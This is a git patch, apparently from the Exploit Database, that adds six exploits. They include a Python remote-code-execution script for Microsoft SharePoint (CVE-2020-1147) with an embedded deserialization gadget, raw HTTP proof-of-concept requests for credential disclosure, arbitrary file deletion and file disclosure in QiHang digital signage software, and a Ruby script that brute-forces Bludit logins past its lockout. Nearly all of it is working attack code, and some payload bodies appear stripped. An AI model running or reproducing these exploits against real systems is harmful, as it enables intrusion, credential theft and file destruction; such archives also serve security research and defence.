From 81f468c9ee582c61ade08d9875d1854b050ef983 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 18 Aug 2020 05:01:50 +0000 Subject: [PATCH] DB: 2020-08-18 6 changes to exploits/shellcodes Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass Microsoft SharePoint Server 2019 - Remote Code Execution QiHang Media Web Digital Signage 3.0.9 - Cleartext Credential Disclosure QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated) --- exploits/aspx/webapps/48747.py | 254 ++++++++++++++++++++++++++++ exploits/hardware/webapps/48748.txt | 48 ++++++ exploits/hardware/webapps/48749.txt | 58 +++++++ exploits/hardware/webapps/48750.txt | 222 ++++++++++++++++++++++++ exploits/hardware/webapps/48751.txt | 138 +++++++++++++++ exploits/php/webapps/48746.rb | 92 ++++++++++ files_exploits.csv | 6 + 7 files changed, 818 insertions(+) create mode 100755 exploits/aspx/webapps/48747.py create mode 100644 exploits/hardware/webapps/48748.txt create mode 100644 exploits/hardware/webapps/48749.txt create mode 100644 exploits/hardware/webapps/48750.txt create mode 100644 exploits/hardware/webapps/48751.txt create mode 100755 exploits/php/webapps/48746.rb diff --git a/exploits/aspx/webapps/48747.py b/exploits/aspx/webapps/48747.py new file mode 100755 index 000000000..b1225b54a --- /dev/null +++ b/exploits/aspx/webapps/48747.py @@ -0,0 +1,254 @@ +# Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution +# Google Dork: inurl:quicklinks.aspx +# Date: 2020-08-14 +# Exploit Author: West Shepherd +# Vendor Homepage: https://www.microsoft.com +# Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016 , SharePoint Server 2010 Service +# Pack 2, SharePoint Server 2019 +# Tested on: Windows 2016 +# CVE : CVE-2020-1147 +# Credit goes to Steven Seele and Soroush Dalili +# Source: https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html + +#!/usr/bin/python +from sys import argv, exit, stdout, stderr +import argparse +import requests +from bs4 import BeautifulSoup +from requests.packages.urllib3.exceptions import InsecureRequestWarning +from requests_ntlm import HttpNtlmAuth +from urllib import quote, unquote +import logging + + +class Exploit: + # To generate the gadget use: + # ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command" + # ysoserial.exe -g TextFormattingRunProperties -f LosFormatter -c "command" + gadget = '/wEypAcAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADGBTw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8+DQo8T2JqZWN0RGF0YVByb3ZpZGVyIE1ldGhvZE5hbWU9IlN0YXJ0IiBJc0luaXRpYWxMb2FkRW5hYmxlZD0iRmFsc2UiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOnNkPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1TeXN0ZW0iIHhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIj4NCiAgPE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCiAgICA8c2Q6UHJvY2Vzcz4NCiAgICAgIDxzZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICAgICAgPHNkOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyBwaW5nIC9uIDEwIDEwLjQ5LjExNy4yNTMiIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0iY21kIiAvPg0KICAgICAgPC9zZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICA8L3NkOlByb2Nlc3M+DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KPC9PYmplY3REYXRhUHJvdmlkZXI+Cw==' + control_path_quicklinks = '/_layouts/15/quicklinks.aspx' + control_path_quicklinksdialogform = '/_layouts/15/quicklinksdialogform.aspx' + control_path = control_path_quicklinks + + def __init__( + self, + redirect=False, + proxy_address='', + username='', + domain='', + password='', + target='' + ): + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + self.username = '%s\\%s' % (domain, username) + self.target = target + self.password = password + self.session = requests.session() + self.redirect = redirect + self.timeout = 0.5 + self.proxies = { + 'http': 'http://%s' % proxy_address, + 'https': 'http://%s' % proxy_address + } \ + if proxy_address is not None \ + and proxy_address != '' else {} + self.headers = {} + self.query_params = { + 'Mode': "Suggestion" + } + self.form_values = { + '__viewstate': '', + '__SUGGESTIONSCACHE__': '' + } + self.cookies = {} + self.payload = """\ + + + + + + + + + + + + + + + + + + + + + + + Deserialize + + {GADGET} + + + + + + + +""".replace('{GADGET}', self.gadget) + + def do_get(self, url, params=None, data=None): + return self.session.get( + url=url, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + data=data, + params=params, + auth=HttpNtlmAuth(self.username, self.password) + ) + + def do_post(self, url, data=None, params=None): + return self.session.post( + url=url, + data=data, + verify=False, + allow_redirects=self.redirect, + headers=self.headers, + cookies=self.cookies, + proxies=self.proxies, + params=params, + auth=HttpNtlmAuth(self.username, self.password) + ) + + def parse_page(self, content): + soup = BeautifulSoup(content, 'lxml') + for key, val in self.form_values.iteritems(): + try: + for tag in soup.select('input[name=%s]' % key): + try: + self.form_values[key] = tag['value'] + except Exception as error: + stderr.write('error for key %s error %s\n' % +(key, str(error))) + except Exception as error: + stderr.write('error for selector %s error %s\n' % +(key, str(error))) + return self + + def debug(self): + try: + import http.client as http_client + except ImportError: + import httplib as http_client + http_client.HTTPConnection.debuglevel = 1 + logging.basicConfig() + logging.getLogger().setLevel(logging.DEBUG) + requests_log = logging.getLogger("requests.packages.urllib3") + requests_log.setLevel(logging.DEBUG) + requests_log.propagate = True + return self + + def clean(self, payload): + payload = payload\ + .replace('\n', '')\ + .replace('\r', '') + while ' ' in payload: + payload = payload\ + .replace(' ', ' ') + return payload + + def get_form(self): + url = '%s%s' % (self.target, self.control_path) + resp = self.do_get(url=url, params=self.query_params) + self.parse_page(content=resp.content) + return resp + + def send_payload(self): + url = '%s%s' % (self.target, self.control_path) + # self.get_form() + self.headers['Content-Type'] = 'application/x-www-form-urlencoded' + self.form_values['__SUGGESTIONSCACHE__'] = self.clean(self.payload) + self.form_values['__viewstate'] = '' + resp = self.do_post(url=url, params=self.query_params, +data=self.form_values) + return resp + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(add_help=True, +description='CVE-2020-1147 SharePoint exploit') + try: + parser.add_argument('-target', action='store', help='Target +address: http(s)://target.com ') + parser.add_argument('-username', action='store', default='', +help='Username to use: first.last') + parser.add_argument('-domain', action='store', default='', +help='User domain to use: domain.local') + parser.add_argument('-password', action='store', default='', +help='Password to use: Summer2020') + parser.add_argument('-both', action='store', default=False, +help='Try both pages (quicklinks.aspx and quicklinksdialogform.aspx): +False') + parser.add_argument('-debug', action='store', default=False, +help='Enable debugging: False') + parser.add_argument('-proxy', action='store', default='', +help='Enable proxy: 10.10.10.10:8080') + + if len(argv) == 1: + parser.print_help() + exit(1) + options = parser.parse_args() + + exp = Exploit( + proxy_address=options.proxy, + username=options.username, + domain=options.domain, + password=options.password, + target=options.target + ) + + if options.debug: + exp.debug() + stdout.write('target %s username %s domain %s password %s +debug %s proxy %s\n' % ( + options.target, options.username, options.domain, +options.password, options.debug, options.proxy + )) + + result = exp.send_payload() + stdout.write('Response: %d\n' % result.status_code) + if 'MicrosoftSharePointTeamServices' in result.headers: + stdout.write('Version: %s\n' % +result.headers['MicrosoftSharePointTeamServices']) + if options.both and result.status_code != 200: + exp.control_path = exp.control_path_quicklinksdialogform + stdout.write('Trying alternate page\n') + result = exp.send_payload() + stdout.write('Response: %d\n' % result.status_code) + + except Exception as error: + stderr.write('error in main %s' % str(error)) + + +Regards, + +West Shepherd +OSWE | OSCE | OSCP | OSWP | CEH | Security+ +West Lee Shepherd, LLC \ No newline at end of file diff --git a/exploits/hardware/webapps/48748.txt b/exploits/hardware/webapps/48748.txt new file mode 100644 index 000000000..ccee75adf --- /dev/null +++ b/exploits/hardware/webapps/48748.txt @@ -0,0 +1,48 @@ +# Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Cleartext Credential Disclosure +# Date: 2020-08-12 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.howfor.com +# Tested on: Microsoft Windows Server 2012 R2 Datacenter +# CVE : N/A + +QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Cleartext Credentials Disclosure + + +Vendor: Shenzhen Xingmeng Qihang Media Co., Ltd. + Guangzhou Hefeng Automation Technology Co., Ltd. +Product web page: http://www.howfor.com +Affected version: 3.0.9.0 + +Summary: Digital Signage Software. + +Desc: The application suffers from clear-text credentials disclosure vulnerability +that allows an unauthenticated attacker to issue a request to an unprotected directory +that hosts an XML file '/xml/User/User.xml' and obtain administrative login information +that allows for a successful authentication bypass attack. + +Tested on: Microsoft Windows Server 2012 R2 Datacenter + Microsoft Windows Server 2003 Enterprise Edition + ASP.NET 4.0.30319 + HowFor Web Server/5.6.0.0 + Microsoft ASP.NET Web QiHang IIS Server + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5579 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php + + +27.07.2020 + +-- + +$ curl http://192.168.1.1/xml/User/User.xml + + + + + + \ No newline at end of file diff --git a/exploits/hardware/webapps/48749.txt b/exploits/hardware/webapps/48749.txt new file mode 100644 index 000000000..afb640765 --- /dev/null +++ b/exploits/hardware/webapps/48749.txt @@ -0,0 +1,58 @@ +# Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion +# Date: 2020-08-12 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.howfor.com +# Tested on: Microsoft Windows Server 2012 R2 Datacenter +# CVE : N/A + +QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Unauthenticated Arbitrary File Deletion + + +Vendor: Shenzhen Xingmeng Qihang Media Co., Ltd. + Guangzhou Hefeng Automation Technology Co., Ltd. +Product web page: http://www.howfor.com +Affected version: 3.0.9.0 + +Summary: Digital Signage Software. + +Desc: Input passed to the 'data' parameter in 'QH.aspx' for delete action +is not properly sanitised before being used to delete files. This can be +exploited by an unauthenticated attacker to delete files with the permissions +of the web server using their absolute path or via directory traversal +sequences passed within the affected POST parameter. + + +Tested on: Microsoft Windows Server 2012 R2 Datacenter + Microsoft Windows Server 2003 Enterprise Edition + ASP.NET 4.0.30319 + HowFor Web Server/5.6.0.0 + Microsoft ASP.NET Web QiHang IIS Server + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5580 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5580.php + + +27.07.2020 + +-- + + +POST /QH.aspx HTTP/1.1 +Host: 192.168.1.74:8090 +Content-Length: 105 +User-Agent: Eraser +X-Requested-With: XMLHttpRequest +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept: */* +Origin: http://192.168.1.74:8090 +Referer: http://192.168.1.74:8090/index.htm +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +responderId=ResourceNewResponder&action=delete&data=["/opt/resources/Billboard.jpg"] \ No newline at end of file diff --git a/exploits/hardware/webapps/48750.txt b/exploits/hardware/webapps/48750.txt new file mode 100644 index 000000000..71d7bdf1a --- /dev/null +++ b/exploits/hardware/webapps/48750.txt @@ -0,0 +1,222 @@ +# Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure +# Date: 2020-08-12 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.howfor.com +# Tested on: Microsoft Windows Server 2012 R2 Datacenter +# CVE : N/A + +QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Arbitrary File Disclosure Vulnerability + + +Vendor: Shenzhen Xingmeng Qihang Media Co., Ltd. + Guangzhou Hefeng Automation Technology Co., Ltd. +Product web page: http://www.howfor.com +Affected version: 3.0.9.0 + +Summary: Digital Signage Software. + +Desc: The application suffers from an unauthenticated file disclosure +vulnerability when input passed thru the 'filename' parameter when +using the download action or thru 'path' parameter when using the +getAll action is not properly verified before being used. This can +be exploited to disclose contents of files and directories from local +resources. + +Tested on: Microsoft Windows Server 2012 R2 Datacenter + Microsoft Windows Server 2003 Enterprise Edition + ASP.NET 4.0.30319 + HowFor Web Server/5.6.0.0 + Microsoft ASP.NET Web QiHang IIS Server + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5581 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5581.php + + +27.07.2020 + +-- + + +Source code disclosure PoC: +--------------------------- + +GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1 +Host: 192.168.1.74:8090 +User-Agent: lfi_test.wrapper/2.9 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +-- + +HTTP/1.1 200 OK +Server: HowFor Web Server/5.6.0.0 +Date: Sun, 26 Jul 2020 22:49:08 GMT +X-AspNet-Version: 4.0.30319 +Content-Disposition: attachment;filename=QH.aspx +Set-Cookie: ASP.NET_SessionId=f0xji5cazmbzdygcr5g3qr03; path=/; HttpOnly +Cache-Control: no-cache +Pragma: no-cache +Expires: -1 +Content-Type: application/zip +Content-Length: 463 +Connection: Close + +<%@ Page Language="C#" ValidateRequest="false" AutoEventWireup="true" CodeBehind="QH.aspx.cs" Inherits="QiHang.Media.Web.QH" %> + + + + + + + + +
+
+ +
+
+ + + + +Arbitrary file read: +-------------------- + +http://192.168.1.74:8090/QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fGlobal.asax +http://192.168.1.74:8090/QH.aspx?responderId=ResourceNewResponder&action=view&fileName=.%2fWeb.config + + +Directory contents disclosure: +------------------------------ + +POST /QH.aspx HTTP/1.1 +Host: 192.168.1.74:8090 +Content-Length: 62 +User-Agent: lfi_test.wrapper/2.9 +X-Requested-With: XMLHttpRequest +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +responderId=ResourceNewResponder&action=getAll&path=&fileName= + +-- + +HTTP/1.1 200 OK +Server: HowFor Web Server/5.6.0.0 +Date: Tue, 28 Jul 2020 23:51:13 GMT +X-AspNet-Version: 4.0.30319 +Set-Cookie: ASP.NET_SessionId=f0ac1jyifcacvufnpptduv1f; path=/; HttpOnly +Cache-Control: no-cache +Pragma: no-cache +Expires: -1 +Content-Type: text/html; charset=utf-8 +Content-Length: 4680 +Connection: Close + +{ + "first": true, + "second": [ + { + "name": "App_Data", + "type": "folder", + "size": 852992.0, + "uploadTime": new Date( + 1525316885250 + ), + "path": "/App_Data" + }, + { + "name": "bin", + "type": "folder", + "size": 4398172.0, + "uploadTime": new Date( + 1525316885046 + ), +... +... + "name": "xml", + "type": "folder", + "size": 25519.0, + "uploadTime": new Date( + 1525316885234 + ), + "path": "/xml" + }, + { + "name": "default.htm", + "type": ".htm", + "size": 1609.0, + "uploadTime": new Date( + 1523859040000 + ), + "path": "/default.htm" + }, + { + "name": "Global.asax", + "type": ".asax", + "size": 100.0, + "uploadTime": new Date( + 1523859032000 + ), + "path": "/Global.asax" + }, + { + "name": "IIS.dll", + "type": ".dll", + "size": 40960.0, + "uploadTime": new Date( + 1523859036000 + ), +... +... + "path": "/Media.Server.DeamonPlugin.Web.xml" + }, + { + "name": "preview.htm", + "type": ".htm", + "size": 947.0, + "uploadTime": new Date( + 1523859040000 + ), + "path": "/preview.htm" + }, + { + "name": "QH.aspx", + "type": ".aspx", + "size": 463.0, + "uploadTime": new Date( + 1523859030000 + ), + "path": "/QH.aspx" + }, + { + "name": "server.xml", + "type": ".xml", + "size": 206.0, + "uploadTime": new Date( + 1523859034000 + ), + "path": "/server.xml" + }, + { + "name": "Web.config", + "type": ".config", + "size": 2470.0, + "uploadTime": new Date( + 1523859034000 + ), + "path": "/Web.config" + } + ], + "third": 0 +} \ No newline at end of file diff --git a/exploits/hardware/webapps/48751.txt b/exploits/hardware/webapps/48751.txt new file mode 100644 index 000000000..c1ac88ef5 --- /dev/null +++ b/exploits/hardware/webapps/48751.txt @@ -0,0 +1,138 @@ +# Exploit Title: QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated) +# Date: 2020-08-12 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.howfor.com +# Tested on: Microsoft Windows Server 2012 R2 Datacenter +# CVE : N/A + + + + + + + +
+ +
+ + + + \ No newline at end of file diff --git a/exploits/php/webapps/48746.rb b/exploits/php/webapps/48746.rb new file mode 100755 index 000000000..587e30929 --- /dev/null +++ b/exploits/php/webapps/48746.rb @@ -0,0 +1,92 @@ +#!/usr/bin/env ruby +## Title: Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass +## Author: noraj (Alexandre ZANNI) +## Author website: https://pwn.by/noraj/ +## Date: 2020-08-16 +## Vendor Homepage: https://www.bludit.com/ +## Software Link: https://github.com/bludit/bludit/archive/3.9.2.tar.gz +## Version: <= 3.9.2 +## Tested on: Bludit Version 3.9.2 + +# Vulnerability +## Discoverer: Rastating +## Discoverer website: https://rastating.github.io/ +## CVE: CVE-2019-17240 +## CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2019-17240 +## References: https://rastating.github.io/bludit-brute-force-mitigation-bypass/ +## Patch: https://github.com/bludit/bludit/pull/1090 + +require 'httpclient' +require 'docopt' + +# dirty workaround to remove this warning: +# Cookie#domain returns dot-less domain name now. Use Cookie#dot_domain if you need "." at the beginning. +# see https://github.com/nahi/httpclient/issues/252 +class WebAgent + class Cookie < HTTP::Cookie + def domain + self.original_domain + end + end +end + +def get_csrf(client, login_url) + res = client.get(login_url) + csrf_token = /input.+?name="tokenCSRF".+?value="(.+?)"/.match(res.body).captures[0] +end + +def auth_ok?(res) + HTTP::Status.redirect?(res.code) && + %r{/admin/dashboard}.match?(res.headers['Location']) +end + +def bruteforce_auth(client, host, username, wordlist) + login_url = host + '/admin/login' + File.foreach(wordlist).with_index do |password, i| + password = password.chomp + csrf_token = get_csrf(client, login_url) + headers = { + 'X-Forwarded-For' => "#{i}-#{password[..4]}", + } + data = { + 'tokenCSRF' => csrf_token, + 'username' => username, + 'password' => password, + } + puts "[*] Trying password: #{password}" + auth_res = client.post(login_url, data, headers) + if auth_ok?(auth_res) + puts "\n[+] Password found: #{password}" + break + end + end +end + +doc = <<~DOCOPT + Bludit <= 3.9.2 - Authentication Bruteforce Mitigation Bypass + + Usage: + #{__FILE__} -r -u -w [--debug] + #{__FILE__} -H | --help + + Options: + -r , --root-url Root URL (base path) including HTTP scheme, port and root folder + -u , --user Username of the admin + -w , --wordlist Path to the wordlist file + --debug Display arguments + -H, --help Show this screen + + Examples: + #{__FILE__} -r http://example.org -u admin -w myWordlist.txt + #{__FILE__} -r https://example.org:8443/bludit -u john -w /usr/share/wordlists/password/rockyou.txt +DOCOPT + +begin + args = Docopt.docopt(doc) + pp args if args['--debug'] + + clnt = HTTPClient.new + bruteforce_auth(clnt, args['--root-url'], args['--user'], args['--wordlist']) +rescue Docopt::Exit => e + puts e.message +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index fa752befb..042716513 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -42987,3 +42987,9 @@ id,file,description,date,author,type,platform,port 48743,exploits/php/webapps/48743.txt,"vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution",2020-08-12,zenofex,webapps,php, 48744,exploits/hardware/webapps/48744.py,"Artica Proxy 4.3.0 - Authentication Bypass",2020-08-13,"Dan Duffy",webapps,hardware, 48745,exploits/php/webapps/48745.txt,"GetSimple CMS Plugin Multi User 1.8.2 - Cross-Site Request Forgery (Add Admin)",2020-08-13,boku,webapps,php, +48746,exploits/php/webapps/48746.rb,"Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass",2020-08-17,"Alexandre ZANNI",webapps,php, +48747,exploits/aspx/webapps/48747.py,"Microsoft SharePoint Server 2019 - Remote Code Execution",2020-08-17,"West Shepherd",webapps,aspx, +48748,exploits/hardware/webapps/48748.txt,"QiHang Media Web Digital Signage 3.0.9 - Cleartext Credential Disclosure",2020-08-17,LiquidWorm,webapps,hardware, +48749,exploits/hardware/webapps/48749.txt,"QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Deletion",2020-08-17,LiquidWorm,webapps,hardware, +48750,exploits/hardware/webapps/48750.txt,"QiHang Media Web Digital Signage 3.0.9 - Unauthenticated Arbitrary File Disclosure",2020-08-17,LiquidWorm,webapps,hardware, +48751,exploits/hardware/webapps/48751.txt,"QiHang Media Web Digital Signage 3.0.9 - Remote Code Execution (Unauthenticated)",2020-08-17,LiquidWorm,webapps,hardware,